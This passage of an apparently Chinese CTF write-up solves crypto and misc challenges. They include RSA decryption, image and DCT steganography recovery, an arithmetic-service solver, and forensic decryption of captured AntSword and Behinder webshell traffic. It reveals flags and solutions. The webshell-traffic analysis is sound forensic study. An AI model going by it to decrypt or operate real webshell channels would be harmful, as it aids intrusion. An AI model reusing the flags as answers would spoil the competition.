c = 2531158826968617795544873459382924122557717998816471394185297761103165748335435821170312723425685754304593149059523546269415450028650433532186356690459152658716429727754058801940418375009330303011015596430823315562597921339142657700112773216179353217193003237231148578980083913537858412584394500321778663550078078453618131369772835451092134304931989160942358095112708247915404212408853664235381251636247376324342533649868102473113101371215832092655082602327789828382399225857288407727650695390198437041349338942170124451717727569429058059588332470520442654660036009106297229315947988026824070192958413771405369270417379270374431961932069206109206161520275394313505820463761099423216881808146286391590926110021195867454364700541623522262060621284175358641983644868144565468138995121112460328796239716467234302639110139539344210308625672626603127571066630984045144311082417597696435510923920160972112096181019887945632185522235223506525708287260043860468761726771872558899346408414769503761014563423778852669138635859686736852316406111419524586006203324427627048026773761720661277548633577985130942663878925016690093178475160050819045078580634083929746843262635482326801110839969924987635836386629346989957215883775774862958649233978388845660025913638761677759389478930243175239144733327800081152106209646739750122765156649897077908081118880599237097094240320843249439338789419717672024431563955989561679955135760168859754158570903936619008811737888041492853293708549071333614052392698390018837802159322555013199352827516627221502851043569094458259655754906871531251591905933391694174493730825567195976485916248779265827481232289167916191548009886470910634735729201594988224309556499928363028987684291355841520596773445265794499135026810820222595295206645909316879282568462640527161761336207089714210305413980656649518317233579495730882264811653783056739697123832993914282956316935519409352921107116007868383349191994002287186205998134696100386762054262057891768468786968255026912722629101160706454
57393868500548461673077440227088318332525177786077962585982909081392743452213436515836182492873087382790116829607874601891834450956381641167347006244967114872271767408283976962956202327963560051360585178283111398393814240663020861119306359981430630334461318598527979587651991738077155410459561082855969587807428348055332235383663543270877360885005990943581071646894235729647933857881942189189195964788620972924776284263603338743142601081333393759426665086063113918052529662779617581088219461544284776161000043214576048792205237424276333238729536999315219803320262415310494740314381427923946285760161213220362947401769801899408530366793758455770179787830710159708291366762213895858480581895447937605701967976294322826723710002908404921197204333501928336488397947305981886203744168652324266585388419008971081621735807393236753248807784949240389823583495318481970909905410207082951161566243891352736504918116010116369039285860115045264314986520115486931579850294563988511898210207789585278091744331562435440306243419157138106612870376595860187680854706702407909421715068436372714427218236082664903646274293310236981999552184563717162690049797649823839212948428641211961246994020372045985043109693907890920011143198228522425009411413552816937251104605065484262631052134984041975196066158316728539316465837577421454925621012505465939978745860769266412410473175108380240421475087705951757181461757168338677815812452986583921755020694839797363363307311249420367570717090866380752846555897878685650237637346642193539401438201833185346403605062877792084684272683771839735015283337498160038558348635653941224481910295785285116501946326239892086374010081144224516863123196440545149447005664309128353405186016987671281958337041826577305665892478912776271010271066357329981367353980788588993847131185936689847735929047041314029051457545700919669011204112014052564352320632957908331611320022462796631613884219972422269071268298589221747096536276961463554726902621981273389711126107538396616770804637751124118841962
30185877234066728564716929551607129141735155379529048300204700285511666205204686244751557147684338591300111406075976759988295937870045743031816067994768915303111125253664865369863586807234945352445045026501495849671447691502253489642657652848949102823407762108943161789244134119866441040670840037015617307056821150285453994199024947457774647253618512995677313792036106100497936654142008173389260345411854520383366800831542339243757421033121103167943520915885043698882609693007629591093225819727653240183003450339802857059736870645197609170799838610316307123146927966669912638227587517396282910946355194781275415343491170583392480153599086125374051844306869510079152461763122622668280249192047024784624692776244265874153473114993619019113474166958126841368545758693832786756946298833891033171752534079387364641021835311861509609494125593285947444939996542402774020507531158198766149282993994638607458820211163623309687149807339960007614766879688676462400606899851539023671152038536934433128973358637812907001112093086713949701646964777013925616637956114825918525229968119306607256312727518429074253193934915609865400118400124334806320033990630595454381780378123232633134565408152216410478497582716891919477755736223636583493709691482948793995974775520709337409910573358960632077245564017495103173982250506224927848890977671698731337737945862469303397352291579706358090437359126171980555387033997507170208063868788685780633727495158542911276981383764698030088894904043298340184342818716278091407356551940358010532738356144600648671870141201656260882560550096111259047730234565173017875969390130055742832375612379167064701421263006004472414998830886590121784525812803198481744263349186310137594023961272959521982892804372412802448375074058059953851751721276448647238818757245128139844126234490887064897176175605991477364838775902549049484485649550475857257115219540606931472558004890564503134870490140656624241401747198540715275804941032074573356860460172868340373583692584902872979221114982298050586685
71988706087341385062164551912895402225385092982560826327309647694259133336796850979092547838896097433415715599058725966408590337763564597138926155440501449180985611396207232111532932375188085024545085542973369098668746251453979325611123899183040426483394595005754804134755226535191207540606825430158952736837655205775065688859586704801501225535006002343875247706830744595624568318309651226721789114981271968662238124026046677255288978864187606405796017383766402958619673143645657441455997232070540086127159246237987567627725108631287219571602471946884739377889215449834429655413686886873295091016239052199666083351601086826734153974429960305084253065178042594753181647956642616542212325228542707686206755326024035739599146348501177812563534707664133720516216365891595825787918995106843259149228748312994412528796391371373617414372675456343701376095861833447737772759691858868592888442826744942275177530915382116406615715712757893143078978279143246697274308325693084656091638002293543907419420858741349983034872100430604784391609038287942720865394687440441658148249741973746563815823734033082270357366531891766736047129461161022479424754670180104429082538796999492573516522302155029457721131208616907738998536735170709971248369824365887000726117794650869883079208008740014546846645701302364858570783166196899378915154505168100826329302107869313843266841156284290464566135649989158820783121418285248550756939109408077028154683076217207573710819678235464207349189067201484570732096639149146760928062704783483877341613038073507448836427114954342514910127221383398345169091277591409968831007802831786813989558646964824169143439055973802066579053574891166719834147832981817205010359316914407771308185896894527780291163151452477051677398769116284677489282840701026276659840287396527270820151904333993047462174806536013299886191109009721024774418187781155804769156349009311281088098841688085936363169386244129140134486836251795815713481563263315210116479221119987277000421457534255675195475306743605721698910
5115974894826691301734658752554796336087163153087013755182247902851847839867807219615044427616326518986674768302109569955218389569458769985874451273117138435546665024826358058600551523916808015505037962468350942106702503883112975634757971636535249998962164886704286732345711210362931312187319836001555348202695806282730945501510756659164231139623277954192087899140537284122009070763979073048837471984618684020674370221463294306239424220412900401460550783283591789801735401367473630854684306273273881688896021682911944793729874921181848098382943970467341811398482121657330781393699096796050290808604481724879698091852697163383826854575487201365106673196811573729247280577781500366763330567122007588833805912087009446499739562463428568952248234506507069953596589309728265145195922268165106056450388840269349409588020300011340940321969965833519126936472969929255823540027083032424724503173052044192907375974391257436211908641463947719594493311129179150043015816776680636855703407557636501711566215605658114055289137679940955
e = 19458216662993202562182929756256684791318810848802754020883513588583377528821730559897870095442161189229950925325157413999927847684731484753811988111830295294129447423655650029218971567158117911790213848402209470536199246476182240248742771389082526603384625792117047996128232952372477895218147279573573322975526303267821446640338606290250958710008158544852602338088244940388562828263436457418528981476220691508040085291576643321726669065360399003917048894093458055139757991688086912143763420958307099065105543361779847689716282373299487102518794317683805758527645283956734672229827240143254092779918701447288342107763
alpha = 8
root = 127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336
# Approximate p from n0 ~ root * p**58, then rebuild q, r and s the same way the
# generator derived them.
approx_p = libnum.nroot(n0 // root, 58)
p = prePrime(approx_p)
print()
q = gen_num(alpha * p)
r = gen_num(2 * alpha * q)
s = gen_num(4 * alpha * r)

# (prime, exponent) pairs that make up the modulus
factors = [(p, alpha), (q, alpha * 2), (r, alpha * 4), (s, 2)]
n = 1
phi_n = 1
for prime, exponent in factors:
    n *= prime ** exponent
    # Totient of a prime power: phi(x**k) = x**k - x**(k-1)
    phi_n *= prime ** exponent - prime ** (exponent - 1)

d = gmpy2.invert(e, phi_n)
m = pow(c, d, n)
print(libnum.n2s(int(m)))
后经提醒：因为 p > m，也可以直接 mod p。
MISC
签到打卡完成
颜色有点淡，可以用 ps 拉对比度，
也可以提取 (239,239,239) 的颜色。
不好扫的话可以用 CQR 扫完再生成一个。
发送SICTF获得flag
color
一张混淆的图片，能看出二维码的痕迹。
![图片](https://img-blog.csdnimg.cn/b4f227e5d22440f8b26db518471f8289.png)
文件尾有额外数据，是压缩包；补上 PK 头解压，得到加密脚本：
from PIL import Image
import random
# Challenge-side obfuscation script, quoted as recovered from the appended archive.
flag = Image.open("flag.png")
flag = flag.convert("RGB")
new = Image.new("RGB",flag.size)
h=flag.height
w=flag.width
# The three channel values a black pixel may be rewritten to
num=[0,128,255]
for i in range(h):
    for k in range(w):
        # NOTE(review): getpixel/putpixel take (x, y), but i runs over the height here,
        # so this stays in bounds only for a square image - presumably the case for a QR code.
        r,g,b = flag.getpixel((i,k))
        if r == 0 and g == 0 and b ==0:
            # Pure black pixel: every channel is picked from num
            new.putpixel((i,k),((random.choice(num),random.choice(num),random.choice(num))))
        else:
            # Any other pixel: every channel is picked at random from 0..255
            new.putpixel((i,k),(random.randint(0,255),random.randint(0,255),random.randint(0,255)))
new.save('save.png')
这个脚本把黑色像素的 rgb 替换为 0、128、255 中的随机值，
白色像素的 rgb 替换为 0-255 中的随机值。
反向写一个脚本：
from PIL import Image
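# Undo the obfuscation: a pixel whose three channels all lie in {0, 128, 255} was
# black in the original image; every other pixel was white.
MARKER_LEVELS = {0, 128, 255}

# convert() guarantees three channels per pixel even if the file carries alpha or a palette
load = Image.open('save.png').convert('RGB')
flag = Image.new('RGB', load.size)
w, h = load.size
# getpixel/putpixel take (x, y): x runs over the width and y over the height, so this
# also works when the image is not square.
for x in range(w):
    for y in range(h):
        r, g, b = load.getpixel((x, y))
        if r in MARKER_LEVELS and g in MARKER_LEVELS and b in MARKER_LEVELS:
            flag.putpixel((x, y), (0, 0, 0))
        else:
            # A white pixel can land on three marker levels by chance and come out black;
            # that is rare enough for the QR code's error correction to absorb.
            flag.putpixel((x, y), (255, 255, 255))
#flag.show()
flag.save('flag.png')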
扫码得到flag
geek_challenge
交互计算题
![图片](https://img-blog.csdnimg.cn/a3c200a9fbd34bb886a0af7da39acfa3.png)
写 pwntools 交互脚本解 5000 次，就很不理解，对服务器不友好。
from pwn import *
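import ast
import operator

context.log_level = 'debug'

# Operators accepted in a question. This set is an assumption about the service;
# extend the table if it uses others.
_BINARY_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def _safe_arith(expression):
    """Evaluate a plain arithmetic expression made of numbers and the operators above.

    The text comes from the remote service. Passing it to eval() would let that
    service run arbitrary Python on the solver's machine, so only numeric literals
    and whitelisted operators are accepted; anything else raises ValueError.
    """
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BINARY_OPS:
            return _BINARY_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError('unexpected token in expression: %r' % expression)

    return walk(ast.parse(expression.strip(), mode='eval'))


r = remote('ctf.qsnctf.com',10840)
r.recvuntil(b'\n\n')
i = 0  # number of rounds answered correctly
while True:
    # The last four bytes of the question line (presumably "= ?\n") are dropped,
    # leaving only the expression.
    calc = r.recvline()[:-4].decode()
    r.sendlineafter(b'answer:', str(_safe_arith(calc)).encode())
    if r.recvline() == b'Good job!\n':
        i += 1
        continue
    # NOTE(review): the pasted script lost its indentation; this assumes any other
    # reply ends the question loop and the session is then handed to the user.
    print(i)
    break
r.interactive()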
hacker
蚁剑流量
tcp20流 追踪HTTP
去掉前九位再解 base64，可以得到：
U2FsdGVkX19bEN3D8vFeG39VyYXPwle2mMQLh5T1HYiSI1XCx7rJhsDnp9qLpUQB
yITd05Uu05ZAv0o=e264c55be
/tmp
a7eb3df874e
U2FsdGVkX19 是 “Salted__” 的 base64 编码，即 OpenSSL 风格带盐密文的固定开头；在线加解密网站的 AES、DES、TripleDES、Rabbit、RC4 输出一般都是这种格式。
解密需要 key；前面的流里可以经常见到一个文件夹：
`cd /var/tmp/password1sGui_1s_shumu`
解rabbit得到flag
hacker2
大黑客树木再次上传了 shell，并用工具进行连接。他在上传目录的一堆测试 txt 中找到了重要的字符串，我们观察并截取了流量。
你能告诉我们他上传的 shell 的名称和 key 值，以及最终找到的重要字符串吗？
flag格式SICTF{shell名称_密钥_文本文件中存储的字符串}
TCP第0流就可以看到 冰蝎马的特征
key是7d7c23e87b47368b
TCP第13流可以看到she1l.php
顺便讲一下，这一流中是冰蝎控制端与被控端进行认证的流量。
然后就是慢慢看流量。
TCP46流追踪HTTP可以找到
uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA==
冰蝎的 AES 使用 CBC 模式，IV 为 16 个 \x00。
用脚本解密
from base64 import b64decode
from Crypto.Cipher import AES
def aes_def(key,input_text):
    """Base64-decode input_text and decrypt it with AES-CBC under an all-zero IV.

    key and input_text are bytes. The plaintext is returned as a str decoded as
    UTF-8 with undecodable bytes dropped; block padding is not stripped.
    """
    # Append "==" when the captured string carries no double padding of its own
    padded = input_text if b"==" in input_text else input_text + b"=="
    ciphertext = b64decode(padded)
    zero_iv = b'\0' * 16
    cipher = AES.new(key, AES.MODE_CBC, zero_iv)
    return cipher.decrypt(ciphertext).decode('utf-8', 'ignore')


# Key and response body taken from the captured traffic described above
key=b"7d7c23e87b47368b"
message = b'uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA=='
decode_message = aes_def(key,message)
print(decode_message)
得到
{"status":"c3VjY2Vzcw==","msg":"YzByUmVjdCEhIQ=="}
msg解码得到 c0rRect!!!
拼起来得到flag
SICTF{she1l_7d7c23e87b47368b_c0rRect!!!}
ezmisc
二血。这题难度还行，是解出人数最少的题，我和一血都是非预期解。
解压的时候 flag.zip 是伪加密，修改两个 09 为 00 后可以解压。
f1ag.png
这是一只流浪的flag留给我们的秘密我需要一个中文拼音全拼。
肯定不是泷奈
看看secret.txt里面
尝试倒序解base64
发现是三个数字，联想为 rgb；一共有 268780 行，刚好和 f1ag 的分辨率对应。
写脚本转为图片；颜色是 rgb 还是 bgr 不影响解题（非预期）。
from PIL import Image
import base64
# One line of the text file per pixel; the last two lines are dropped
# (presumably they are not pixel data).
with open('secret~.txt','r') as fh:
    secret = fh.readlines()[:-2]
f1ag = Image.open('f1ag.png')
print(f1ag.size)
secret_img = Image.new('RGB', f1ag.size)
w, h = f1ag.width, f1ag.height
for i in range(w):
    column_start = i * h
    for k in range(h):
        # Each line is stored reversed: flip it, split it into its base64 fields,
        # then put the fields back in their original order.
        fields = secret[column_start + k][::-1].split()[::-1]
        decode_base = [int(base64.b64decode(field).decode()) for field in fields]
        # Whether the channel order is RGB or BGR does not matter for solving
        r, g, b = decode_base[0], decode_base[1], decode_base[2]
        secret_img.putpixel((i, k), (r, g, b))
# secret_img.show()
secret_img.save('wtf2.png')
其实已经可以看出来六花了
拿这个图和f1ag异或
小鸟游六花我甚至把原图都找出来了 pid 93430703
f1ag.png 文件尾有 OurSecret 的隐写特征，
用 OurSecret 解 f1ag.png，密码 xiaoniaoyouliuhua
得到flag.txt
没用到Xkey和attachment.7z非预期了
其实xkey解XXencode是7z的密码里面是个混淆的加密脚本
王八树木
打开树木
一眼 jpg 倒序，反过来后文件尾有个加密 zip。
爆破得到密码123456
得到密码SI!!!!!!
jpg解silentEye
得到猫脸变换的参数
脚本还原
import cv2
import numpy as np
import matplotlib.image as mpimg
def de_arnold(img,shuffle_time,a,b):
    """Apply the inverse Arnold (cat map) pixel permutation shuffle_time times.

    img is a 3-D array (rows, cols, channels); a and b are the map parameters.
    Each pass moves pixel (i, j) to
    (((a*b + 1)*i - b*j) % rows, (-a*i + j) % cols) and returns a uint8 copy.
    With shuffle_time == 0 the input array itself is returned.
    """
    rows, cols, _channels = img.shape
    scratch = np.zeros(img.shape, np.uint8)
    for _ in range(shuffle_time):
        # np.ndindex walks (i, j) in row-major order, like two nested range loops
        for i, j in np.ndindex(rows, cols):
            x = ((a * b + 1) * i - b * j) % rows
            y = (j - a * i) % cols
            scratch[x, y, :] = img[i, j, :]
        # Copy, so the next pass reads a stable source while scratch is rewritten
        img = np.copy(scratch)
    return img
# Load the scrambled bitmap and reverse the channel axis before handing it to OpenCV
# (presumably RGB from matplotlib to the BGR order cv2.imshow displays).
scrambled = mpimg.imread('flag.bmp')
img = scrambled[:, :, ::-1]
# Two passes with a = 1, b = 2: the parameters recovered in the previous step
new = de_arnold(img, 2, 1, 2)
cv2.imshow('picture', new)
cv2.waitKey(0)
Revenge
zip是伪加密
uncompyle6反编译pyc得到加密脚本
# uncompyle6 version 3.8.0
# Python bytecode 3.7.0 (3394)
# Decompiled from: Python 3.8.10 (default, Nov 14 2022, 12:59:47)
# [GCC 9.4.0]
# Embedded file name: encode.py
# Compiled at: 2023-01-17 14:47:26
# Size of source mod 2**32: 439 bytes
import secret
import cv2
import numpy as np
from random import randint
# Decompiled embedding script: hides one character of `secret` in each 8x8 block of a
# 64x64 block grid by forcing the (7, 7) DCT coefficient of one colour channel.
# NOTE(review): `secret` is imported as a module above but indexed like a string here -
# presumably a decompilation artefact; confirm against the original source.
Hg = np.float32(cv2.imread('flag.png', 1))
for i in range(64):
    for j in range(64):
        # The channel carrying this block's bit is chosen at random (0, 1 or 2)
        Si = randint(0, 2)
        Fe = Hg[:, :, Si]
        Mg = cv2.dct(Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8])
        # '1' sets the coefficient to +20, '0' to -20; any other character leaves it unchanged
        if secret[(i * 64 + j)] == '1':
            Mg[(7, 7)] = 20
        else:
            if secret[(i * 64 + j)] == '0':
                Mg[(7, 7)] = -20
        # Inverse DCT writes the modified block back into the chosen channel
        Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8] = cv2.idct(Mg)
        Hg[:, :, Si] = Fe
# The result overwrites flag.png in place
cv2.imwrite('flag.png', Hg)
# okay decompiling key.pyc
8x8 DCT 分块变换。
secret 是由 0 和 1 组成的。
Si 是 0-2 的随机数，爆破一下：
import cv2
import numpy as np
from random import randint
# Load the stego image as float32, the same way the embedding script did
Hg = np.float32(cv2.imread('../flag.png', 1))
# Recovered bits, in block order
secret = []
# Walk the 64x64 grid of 8x8 blocks
for i in range(64):
    rows = slice(8 * i, 8 * i + 8)
    for j in range(64):
        cols = slice(8 * j, 8 * j + 8)
        # The embedder picked the channel at random, so all three are inspected.
        # A bit is appended for every channel that passes the threshold, so the output
        # stays aligned only while untouched channels keep |coefficient| <= 10.
        for Si in range(3):
            coeff = cv2.dct(Hg[rows, cols, Si])[7, 7]
            if coeff > 10:
                secret.append('1')
            elif coeff < -10:
                secret.append('0')
# Print the recovered bit string
print(''.join(secret))
得到
01001010011100000011001001001010010001000100010001101011011011010101000100110001010100100111001101010001001110010110011001101010001101100011001101110000011101000110000101011000010000010101001101100010010001110110010101001010001101010111010101110001001100100101010101100011011001010101011101001100011001010101001101000010011110000100011001010111010001100101010101011000001101110110100001100011010101110011001001100010011010100101001001101101010001110101001001101110010010110101010000111001011100010100111001100110011001000100011101001100001100100111001000111000011100110011100001101101011010110101000101101111010001100100011001100101010101100011010001011010011110000011001001000111010000100101001001010101010101010110001101010110011010010110101101010010011001010101011001110101010110100110111100111001001101110101010101000110010110010110011101010011001100010101001000110101010001100100001101010011011000100110010101101010010001010110111101000011011101110101000101110111010001100100001101011001011101110101010001001011011010110011011101010011001101100111010101011010011010010101101001101001011001100100001000110010010000010110001001001000011100000110010101011010011101100100000101111001010000100100110101001010011001110101010001101010010010110101001101110111011100100111101001010010011100100111001000110011001100110011001001110100011000010011100001100101011001000011010101111000010001110100001001101000001101010100111001100010011100100101010101111000011000110111011101000010010010110101100001010111011000100110100001001101010000110111101001011010001100100100010001110001011101000100000100110001011101000110001101111001010010100110111000110111010000010111010101111010010001100100101101001000001110010110011101101101011011110100111001000010011010100100101001110011011110010110001001000101001101000110101001001010001101010111001001110101010011000100000101000010010000100011001001001100011011110100101001110111001101100111011101100101001100010100100001100001010101010110100001101011010100100100110101101011
00110010001101000110001001000101011101000011001001110011011011110101010101110011011010000101010101100111010101000101010101010100010001010100110101010100011010010100110100111001001100100011001101101001011100110101010101110101011011100100101000110011010100010110100001100100010011100011100101001100011000110100111000110100001101110011011001101011010000110110010001110011010001110011001001000001011100010110010101110111011110000111100001011010010001000110000101010101010001010111001101010011011000100011011100110100011001110101100101010000001100110111000000111001001101000011010001110000010100000110100001110110010011000111001001101111010011000011100001101000011010100101011001101111010010000111011101000100011110100110001001000011011000110101010101011001010000110011001001101000010110100011001101110000001100100111011101101110010110100101001101100011011011100101101001100100011110000011001100110001011010100101000101000101011100100011011001001011011110000110111101100101001100100110001001101010011000010111001001110011001101110111000001000001011100110100100001101001011100000100110101000010001101010110000101100010001100010100000101110100011100010110100101100110001100100111100001001100010001000100101100110011010001000101001100110101011100010110100001000100010000010101000001001010010011000100101001101111011110100100110001101011011110010100010101011000011101110110111001010011001100110110010101110011010100010110010101001100011000010100001001001010010101010100011001101101011100100100011101011001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
去掉最后补全用的0